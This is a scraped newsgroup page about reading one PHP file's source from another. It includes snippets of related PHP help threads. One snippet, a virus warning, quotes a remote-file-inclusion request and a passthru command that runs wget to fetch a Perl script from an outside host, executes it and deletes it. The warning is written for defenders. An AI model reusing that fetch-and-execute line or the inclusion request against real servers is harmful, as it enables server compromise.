want to get content of one php file in another php file

i have one php file having content

Contents of ex1.php file
<?php
$content = "c://webserver/www/abc.php";
$handle = fopen($content, "r");
echo fread($handle,filesize($content));
?>
this is reading abc.php file in which i m simply using an echo
statement. When i execute ex1.php file i cant see the php statement of
abc.php file

content of abc.php file is
<?php echo "hello";?>

sarika wrote:
> i have one php file having content
>
> Contents of ex1.php file
> <?php
> $content = "c://webserver/www/abc.php";
> $handle = fopen($content, "r");
> echo fread($handle,filesize($content));
> ?>
> this is reading abc.php file in which i m simply using an echo
> statement. When i execute ex1.php file i cant see the php statement of
> abc.php file
>
> content of abc.php file is
> <?php echo "hello";?>

That's interesting, I've found out that it's the browser that's hiding <?php
?> tags within .phpx pages. Probably to avoid short tags scripts (on a
server that doesn't allow them) from getting leaked by visitors who don't
know about this browser trick, until the dev' realizes his error.

Not a good thing, IMO; dev's should take care, themselves, and it's still
not secure since the hidden string is still in the rendered source. And now
we don't know how to escape this one. Do we?

-thib�
0
thyb0 (37)
2/16/2008 7:46:09 PM
thib� wrote:
> sarika wrote:
>> i have one php file having content
>>
>> Contents of ex1.php file
>> <?php
>> $content = "c://webserver/www/abc.php";
>> $handle = fopen($content, "r");
>> echo fread($handle,filesize($content));
>> ?>
>> this is reading abc.php file in which i m simply using an echo
>> statement. When i execute ex1.php file i cant see the php statement of
>> abc.php file
>>
>> content of abc.php file is
>> <?php echo "hello";?>
>
> That's interesting, I've found out that it's the browser that's hiding
> <?php ?> tags within .phpx pages. Probably to avoid short tags scripts
> (on a server that doesn't allow them) from getting leaked by visitors
> who don't know about this browser trick, until the dev' realizes his error.
>
> Not a good thing, IMO; dev's should take care, themselves, and it's
> still not secure since the hidden string is still in the rendered
> source. And now we don't know how to escape this one. Do we?
>
> -thib�

This is normal operation.  The interpreter does not parse files read
with fread().  If you just want to include them in the script, include
or require them.

--
==================
Remove the "x" from my email address

0
jstucklex (14659)
2/16/2008 8:38:51 PM
Jerry Stuckle wrote:
> thib� wrote:
>> sarika wrote:
>>> i have one php file having content
>>>
>>> Contents of ex1.php file
>>> <?php
>>> $content = "c://webserver/www/abc.php";
>>> $handle = fopen($content, "r");
>>> echo fread($handle,filesize($content));
>>> ?>
>>> this is reading abc.php file in which i m simply using an echo
>>> statement. When i execute ex1.php file i cant see the php statement of
>>> abc.php file
>>>
>>> content of abc.php file is
>>> <?php echo "hello";?>
>>
>> That's interesting, I've found out that it's the browser that's hiding
>> <?php ?> tags within .phpx pages. Probably to avoid short tags scripts
>> (on a server that doesn't allow them) from getting leaked by visitors
>> who don't know about this browser trick, until the dev' realizes his
>> error.
>>
>> Not a good thing, IMO; dev's should take care, themselves, and it's
>> still not secure since the hidden string is still in the rendered
>> source. And now we don't know how to escape this one. Do we?
>>
>> -thib�
>>

> This is normal operation.  The interpreter does not parse files read
> with fread().  If you just want to include them in the script, include
> or require them.

I think the purpose here is to actually output the source.
Well, we've got highlight_[file/string](), but maybe akira wants 'more'.

-thib�
0
thyb0 (37)
2/16/2008 9:41:54 PM
thib� wrote:
> Jerry Stuckle wrote:
>> thib� wrote:

>>> That's interesting, I've found out that it's the browser that's
>>> hiding <?php ?> tags within .phpx pages. Probably to avoid short tags
>>> scripts (on a server that doesn't allow them) from getting leaked by
>>> visitors who don't know about this browser trick, until the dev'
>>> realizes his error.
>>>
>>> Not a good thing, IMO; dev's should take care, themselves, and it's
>>> still not secure since the hidden string is still in the rendered
>>> source. And now we don't know how to escape this one. Do we?
>>>
>>> -thib�
>>>

>> This is normal operation.  The interpreter does not parse files read
>> with fread().  If you just want to include them in the script, include
>> or require them.
>>

> I think the purpose here is to actually output the source.
> Well, we've got highlight_[file/string](), but maybe akira wants 'more'.
>
> -thib�

OK, then you need to use html_entities() to convert the html special
characters.

--
==================
Remove the "x" from my email address
Jerry Stuckle
JDS Computer Training Corp.
jstucklex@attglobal.net
==================

0
jstucklex (14659)
2/16/2008 9:46:17 PM
Jerry Stuckle wrote:
> thib� wrote:
>> Jerry Stuckle wrote:

>>> This is normal operation.  The interpreter does not parse files read
>>> with fread().  If you just want to include them in the script,
>>> include or require them.
>>>

>> I think the purpose here is to actually output the source.
>> Well, we've got highlight_[file/string](), but maybe akira wants 'more'.
>>
>> -thib�
>>

> OK, then you need to use html_entities() to convert the html special
> characters.

Ha, yep !
That was obvious..
Thanks.
0
thyb0 (37)

PHP does not parse .PHP files
I have this problem with PHP that someone might be able to help. With CLI, I am able to execute my .php files. For example, if I type "php phpinfo.php" , this works fine on my system. If I put the phpinfo.php file is in /var/www/html and I try to access it through the browser, I get the content of the file and not the execution of the file. Instead of display the info of PHP, I got the text of the file as: <?php phpinfo(); ?> Why? Thanks Phong Ho wrote: >I have this problem with PHP that someone might be able to help. > >With CLI, I am able to execute my ....

Is a PHP variable supposed to be seen in a .js file included into a .php file
Is a PHP variable supposed to be seen in a .js file included into a .php file? I have a client side javascript code stored in a .js file which is included into a PHP file using <script src="filename.js></script> This code initialises a Javascript variable var u="string"; The string is supposed to be the value of $HTTP_HOST So, when initialise this variable like var u=<? echo $HTTP_HOST;?>; I sterted getting a javascript message Syntax Error Am I doing something wrong, or PHP variables are not seen in included js files? aa wrote: > Is a PHP variable supposed to be seen in a .js file included into a .php > file? > > I have a client side javascript code stored in a .js file which is included > into a PHP file using > <script src="filename.js></script> > > This code initialises a Javascript variable > var u="string"; > > The string is supposed to be the value of $HTTP_HOST > > So, when initialise this variable like > > var u=<? echo $HTTP_HOST;?>; > > I sterted getting a javascript message Syntax Error > > Am I doing something wrong, or PHP variables are not seen in included js > files? js files are not parsed for PHP code unless you specifically tell the webserver to do so. Therefore, "var u=<? echo $HTTP_HOST;?>;" in the .js will error since the browser doesn't know what to do. -- Justin Koivisto - spam@koiv...

Open .php file with PHP Designer 2007 by clicking the file in XP
In windows XP, I want to be able to click on a .php file and have it opened in PHP Designer 2007, Or right-click on it and have an "edit" menu option presented to me. I know how to tweak the registry to do this in general, but what would the command line look like in this specific case ? PHP Designer does not do this automatically. It is as if the program does not allow commandline options. It only opens with the last file used or a menu of recently opened files. ...

SSI Including PHP File Within PHP File Causes Seg Fault and Crash
Can somebody concur or verify the following? I'm having this problem on all of my installations. I've got Apache 2.0.40 and PHP 4.2.2 installed and configured from RedHat RPMs. Nothing out of the ordinary. In the httpd.conf file, PHP files are called with the following: <Files *.php> SetOutputFilter PHP;INCLUDES SetInputFilter PHP LimitRequestBody 524288 </Files> I create two files as follows: /test1.php <!--#include virtaul="/test2.php" --> and /test2.php Testing 1 2 3 By going to http://host/test1.php, it may or may not display the fi...

Getting a file via http or evaluating a php file and getting its output
I need to somehow merge two separate web programs written in php together (from the user's perspective). This solution won't be perminant, I just need something done quickly. I was thinking of two different approches. One would be to download a processed version (modified so it will create validating html with the page it's being embeded in) of one of the programs with the other, then just use print to embed it in the page. I couldn't find out how to get a file via http here (http://us2.php.net/manual/en/index.php). Sorry if I missed this in the docs. The other would be t...

Parsing a php include (which also contains php code)
Hello, I am using the <?php include() ?> statement on my website for organizational purposes. However, one of my includes contains some PHP code. Is there any way for the server to actually parse the include? I've tried this before, and it did not parse the include. Rather, it included the file as just plain ASCII. ======================= /*EXAMPLE 1*/ /*index.php*/ .... <?php include('global/includes/footer.inc') ?> .... /*footer.inc*/ .... <p>&copy 1993-<?php echo date("Y") ?> Kingswood School. All rights reserved.</p> .... /*EXA...

php assembly of multiple php files
I am trying to combine multiple php pages into 1. Basically I have created a shell page and then a seperate php file for each form to be included within the shell. The problem I am having is that when a user submits one of the forms the main shell and the other php files POST values are all returned as NULL and I only get the values pertaining to the form that was submitted?. If all the files were combined into one very long php file, I would get all the POSTs returned how can I do the same but with multiple files? When you submit an include, do the POST values not get passed back to the Main calling page? Thank you, QB Question Boy wrote: > I am trying to combine multiple php pages into 1. > > Basically I have created a shell page and then a seperate php file for > each form to be included within the shell. > > The problem I am having is that when a user submits one of the forms > the main shell and the other php files POST values are all returned as > NULL and I only get the values pertaining to the form that was > submitted?. If all the files were combined into one very long php > file, I would get all the POSTs returned how can I do the same but > with multiple files? > > When you submit an include, do the POST values not get passed back to > the Main calling page? > > Thank you, > > QB This has nothing to do with PHP - it's how HTML works. The browser will only send the data for the form being subm...

When does the php interpreter loads the php file?
Hi All, I'm wondering three facts about php, apache and apache module. 1.How can i differentiate the php intepreter if it's running as a apache module or as cgi? 2.When does the php interpretor loads the php file to main memory? 3.and till when it keeps the php file on memory? - in my experience only after installing Zend it caches the php file. Thak you *** Kim Gijung wrote/escribi� (20 Oct 2004 00:03:35 -0700): > 1.How can i differentiate the php intepreter if it's running as a > apache module or as cgi? If I recall correctly phpinfo() calls it "Server API&qu...

Modify a php file(model) with php
I have an invoice model on my server! and i want to replace some field(like adresse, phone, price, VAT, ....) do you know a tools or class that allows those kind of manipulations Thanks you Yoni Yoni Alhadeff a �crit : > I have an invoice model on my server! and i want to replace some field(like > adresse, phone, price, VAT, ....) > > do you know a tools or class that allows those kind of manipulations > > Thanks you > > Yoni > > Couldn't you replace field with var and have them set when including your template (it become one in fact) ? I didn'...

processing PHP script in a file within another file
OK, that subject line is about as confused as I feel. Please bear with me. I've a Web site with the page: page.php All the internal links on this site use $_GET to generate new page content. So a link for "site map" will href to "page.php?pid=smap". Then in page.php is examines the $_GET['pid'] and runs: $filename = 'data/' . $_GET['pid'] . '.php'; $txt_main = file_get_contents($filename); That's in PHP tags above any HTML. Then down in the HTML body is this: <div id="content"><?=$txt_main?></div> OK, that's all well and good, works fine for this site. Except if I want to include any PHP script in the child pages, like in the example above, in smap.php. Any PHP script I put in there just gets ignored. I'm sure it's because when page.php does the file_get_contents it's just treating everything in smap.php as text and somehow prevents it from running through the PHP processor even when it's echoed in the <?=$txt_main?>. Without changing the overall site structure (that is, keeping the page.php as the universal subpage and then having all the various subpage content in included files that get pulled into page.php) is there some way around this? So I can have PHP in the data files that get pulled into page.php? Thanks for any suggestions! Liam "Mechphisto" <mechphisto@gmail.com> wrote in message news:97acf0df-b9ee-43ae-a034-08668d93d142@s20g2...

passing variable from one php file to another?
Dear All, I am wondering how to pass one variable from one php file to another continuously or discontinuously. For example, variable $a is declared in file1.php. I like to use that variable in file2.php or file3.php where in file2.html, I won't use that variable. Looking forward to your help. Thanks for your time and experience. Ko Ko wrote: > I am wondering how to pass one variable from one php file to another > continuously or discontinuously. Files do not contain variables at all. They are just code on a disk, they are static. What you are referring to is either some kind o...

cron jobs in PHP admin to run a PHP file
I want to run a php script every day. The page goes to a directory and parses a file and adds data to the database. Where it says "command" in cron jobs I don't know what it is looking for? Can I put the name of my php file? This is what I have: Minute Hour Day Month Weekday Command 1 8 1-7 1-31 * myPage.php The reason I am asking is I don't have a clue what PHPadmin wants in the command box. All I want to do is run the php script. Thanks, janis JRough wrote: >I want to run a php script every day. The page goes to a directory > and > parses a file and adds data to the database. Where it says "command" > in cron jobs I don't know what it is looking for? Can I put the name > of my php file? > > This is what I have: > > Minute Hour Day Month Weekday Command > 1 8 1-7 1-31 > * myPage.php > > The reason I am asking is I don't have a clue what PHPadmin wants in > the command box. All I want to do is run the php script. > > Thanks, > janis usually you would put the path to the php interpreter followed by any required options followed by the script file name On May 27, 12:17 pm, JRough <jlro...@yahoo.com> wrote: > I want to run a php script every day. The page goes to a directory > and > parses a file and add...

Why are my PHP files are not being executed (PHP keywords/syntax being ignored)
I have been hosting a website on the same server for roughly 2 years. The entire site is based on a group of PHP scripts. Today, without changing a thing, the server stopped recognizing all PHP keywords and syntax. When I use firefox, the page simply displays a text/plain version of my source code. When I use IE, the page loads as text/html, however, all lines of PHP code (between "<?" and "?>") are displayed as text. My assumption is that my host has stopped providing PHP extensions. Can anybody confirm this or give me another explanation? All help is greatly ap...

Failed opening required 'PEAR.php' (include_path='F:\www\include') in F:\Program Files\PHP\PEAR\Text\CAPTCHA.php on line 22
Hi, Guys=EF=BC=8Cwhen I run my site ,I got some errors: Warning: require_once(PEAR.php) [function.require-once]: failed to open stream: No such file or directory in F:\Program Files\PHP\PEAR \Text\CAPTCHA.php on line 22 Fatal error: require_once() [function.require]: Failed opening required 'PEAR.php' (include_path=3D'F:\www\include') in F:\Program Files \PHP\PEAR\Text\CAPTCHA.php on line 22 It appears that it cann't find the pear.php ,but i checked my dir,and this file was there,and also I have my php.ini file checked,the include_path=3Dinclude_path=3D".;F:\Program Files\PHP\pear;F:\www \include" ,it looks all right,was there anything I have missed in the config file?Or something wrong ? Wish somebody can help me out. Thanks, Mikay >Warning: require_once(PEAR.php) [function.require-once]: failed to >open stream: No such file or directory in F:\Program Files\PHP\PEAR >\Text\CAPTCHA.php on line 22 >Fatal error: require_once() [function.require]: Failed opening >required 'PEAR.php' (include_path='F:\www\include') in F:\Program Files >\PHP\PEAR\Text\CAPTCHA.php on line 22 So where is the pear.php file? >It appears that it cann't find the pear.php ,but i checked my dir,and >this file was there,and also I have my php.ini file checked,the >include_path=include_path=".;F:\Program Files\PHP\pear;F:\www >\include" ,it looks all right,was there anything I have missed in the >config...

testing PHP 5 with Apache 2 and php info file
When I go to look for php info file in the browser all i get is the actually words. <?php phpinfo(); ?> any obvious problems? thanks ...

testing PHP 5 with Apache 2 and php info file
When I go to look for php info file in the browser all i get is the actually words. <?php phpinfo(); ?> any obvious problems? thanks ...

how to mark php document as cachable (expires only when php file changes)

PHP File upload
Hi, I have to allow my visitors to upload image on my site. I am using the follwoing code to do that: $uploaddir = 'admin/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile); My problem is that I expect them to use same file name, like all of them will be uploading files like, comments.rtf. So if there is already one comments.rtf the file will get overwriten... so the challenge is to rename the files to username-filename.rtf can anybody here will take the pain to modify...

File Permissions of PHP Session Files
Hi! I noticed that the file permissions (unix) of the PHP session files have only read and write permissions for the Apache process (600 or rw- --- ---). Does anyone have any idea where this permission is set ? I can't find any umask or chmod settings for it in the php.ini file. Can't find anything in the httpd.conf either. Is it set in the PHP code that implements session_start()? Thanks for any pointers Those files are created and modified by the the apache process, so you probably want the umask of that user (most likely "nobody"). Just out of curiosity, why do you...

file php how a js recalled by other file
I have a File0.php with code: <?php $var2='Hello'; ?> <script type="text/javascript"> var vp2 = '<?php print $var2; ?>' ; document.write(vp2) ; </script> ok work; but would like to use other solutions, also to see how work php with js: 1) var vp2 = '<?php $var2; ?>' ; why so not work ? (absolute want print or echo) 2) to move this row <?php $var2='Hello'; ?> form File0.php to a new file1.js see that it is a php code, think that only solution is however to make a file1.php but with header in javascript that will be recalled after from File0.php: is possible , how ? (noice, not want use include o require beause interesting at insert .js (or simulation) inner php file) ...

PHP/Perl/Unix Virus: delete config.php files asap
There were some strange requests to my server asking for config.php file (which I do not have in the requested location). I did some investigation. Seems to be a virus written in perl, exploiting a vulnerability in php code. The requests are like this 216.120.231.252 - - [30/Aug/2006:13:28:03 -0500] "GET /algebra/about/history/config.php?returnpath=http://domates.1gig.biz/spread.txt? HTTP/1.1" 404 561 "-" "libwww-perl/5.805" File spread.txt contains this: <? passthru('cd /tmp;wget http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*'); pas...

getting the name of the PHP file
Hi! I am a PHP beginner, and I don't know my way around. Let's say I have a file named as "file.php". Is there a special variable that already includes the file name, or should I just manually code it into the script; i.e. $filename = "file.php"? I am writing a script that prints out some information about each HTML/PHP file in my home directory. The name of the file is among them. Thanks for your time! Tuomas Tuomas napisal(a): > Hi! I am a PHP beginner, and I don't know my way around. Let's say I > have a file named as "file.php". Is...

PHP within PHP...
I took over the support of a website that is set up something like this inside one of the pages: include_once("header.php"); <?php //to get the content of the page they do this: $content = mysql_query("select content etc...); echo $content; ?> include_once("footer.php"); I am having problems evaluating any php that is used in the mysql content. Is there a way to get the mysql withing the mysql to run? Thank you for your time, Mandragon On Sep 17, 12:56 pm, Mandrago...@gmail.com wrote: > I took over the support of a website that is set up something like > this inside one of the pages: > > include_once("header.php"); > > <?php > //to get the content of the page they do this: > $content = mysql_query("select content etc...); > > echo $content; > ?> > > include_once("footer.php"); > > I am having problems evaluating any php that is used in the mysql > content. Is there a way to get the mysql withing the mysql to run? > > Thank you for your time, > > Mandragon Sorry, The question should read: "Is there a way to get the php withing the echo $htmlcontent to run?" Of course you are, $content is a resource. The MySQL Query resource. try this: $content = mysql_query('bla bla bla'); while ($row = mysql_fetch_assoc($content)) { $result[] = $row; } $content = $result; Now you can use $content ;). In answer to your edit... eval($co...

Web resources about - want to get content of one php file in another php file - comp.lang.php

Portal:Contents/Culture and the arts - Wikipedia, the free encyclopedia
The word culture is derived from the Latin root cultura or cultus meaning to "inhabit, cultivate, or honour". In general, culture refers to human ...

Safe Schools: George Christensen welcomes 'gutting' of 'bad content' in anti-bullying program
The Federal Government orders changes to the Safe Schools anti-bullying program following a review and a rebellion by backbench MPs.

How a Dental Company Is Building Its Brand With Content Marketing
In the spirt of the famous song, 'It's Five O'clock Somewhere," the same idea can be applied to content. Somewhere, somebody is looking for information ...

Nokia Ozo: A 360° 3D VR camera out to populate the barren content desert
... year of virtual reality . And yet, with such a focus on headset hardware, it's easy to forget that there's a whole world of software and content ...

Sitefinity delivers improved content management and customer analytics
In modern fast-moving business environments, marketers need to be able to respond quickly to changes and deliver appropriate content. To help ...

Why You Need to Write More Controversial Content
... of alienating a major section of your audience. However, there’s a distinct advantage and an enormous value to producing controversial content ...

Companies don't Need Content; they Need Things to Happen When they Publish
“Far less thought goes into making history than remembering it.” [Peter Tunjic] This is reason enough for a whack on the side of the head —but ...

UTA Teaming With Viz Media To Develop Live-Action Anime Content
VIZ Media , a publisher, distributor and licensor of Japanese manga and anime properties in North America, is teaming with UTA to develop live-action ...

Decider’s Guide to Skinny Bundles: How to Get Cable Content on a Streaming Budget
... soon, so for now, if you want to cut your cable costs, “skinny bundles” are the way to go. Streaming services are producing the best content ...